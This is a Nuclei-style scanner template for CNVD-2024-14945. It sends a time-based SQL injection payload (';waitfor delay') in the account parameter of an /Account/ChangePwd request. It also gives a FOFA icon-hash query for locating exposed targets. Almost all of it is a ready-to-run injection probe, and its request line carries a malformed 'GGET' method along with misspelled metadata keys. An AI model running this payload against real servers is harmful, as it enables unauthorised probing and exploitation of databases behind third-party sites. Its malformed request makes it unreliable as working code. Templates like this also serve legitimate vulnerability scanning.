id: CNVD-2024-14945

info:
  name: CNVD-2024-14945
  author: lengmo
  severity: high
  description: CNVD-2024-14945
  tags: sqli
  metadata:
    fofa-qeury: icon_hash="-491165370"
    veified: true
    max-request: 1

http:
  - raw:
      - |
        GGET /Account/ChangePwd?oldpwd=123456&newpwd=123456&conpwd=123456&account=1%27;waitfor%20delay%20%270:0:5%27--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
        Accept-Encoding: gzip, deflate, br
        Connection: close


               
    matchers:     
      - type: dsl
        dsl:
          - "status_code_1 == 200 && duration>=5 && duration<=8 && contains(body,'用户输入的旧密码')" 